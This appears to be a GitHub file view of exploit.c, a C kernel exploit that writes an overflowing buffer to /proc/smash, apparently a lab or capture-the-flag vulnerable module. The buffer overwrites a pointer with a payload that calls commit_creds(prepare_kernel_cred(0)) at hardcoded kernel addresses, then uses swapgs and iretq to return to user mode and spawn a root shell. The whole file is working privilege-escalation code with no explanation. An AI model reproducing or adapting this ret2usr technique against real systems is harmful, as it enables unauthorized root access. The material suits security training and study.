-
Notifications
You must be signed in to change notification settings - Fork 56
/
Copy pathexploit.c
55 lines (48 loc) · 1.23 KB
/
exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
struct trap_frame{
void *rip;
uint64_t cs;
uint64_t rflags;
void *rsp;
uint64_t ss;
};
struct trap_frame tf;
void launch_shell() {
getuid();
system("/bin/sh");
}
void prepare_tf(){
asm( "movq %%cs, %0\n"
"movq %%ss, %1\n"
"movq %%rsp, %3\n"
"pushfq\n"
"popq %2\n"
: "=r"(tf.cs), "=r"(tf.ss), "=r"(tf.rflags), "=r"(tf.rsp) :: "memory"
);
tf.rip = &launch_shell;
tf.rsp -= 1024;
}
#define KERNCALL __attribute__((regparm(3)))
void (*commit_creds)(void *) KERNCALL = (void *)0xffffffff81079680;
void *(*prepare_kernel_cred)(void *) KERNCALL = (void *)0xffffffff810799b0;
void payload(void){
commit_creds(prepare_kernel_cred(0));
asm( "swapgs\n"
"mov $tf,%rsp\n"
"iretq\n"
);
}
int main(){
char buf[16]={0};
memset(buf,'A',16);
*(void **)(buf+8) = &payload;
prepare_tf();
int fd=open("/proc/smash",O_WRONLY);
write(fd,buf,sizeof(buf));
return 0;
}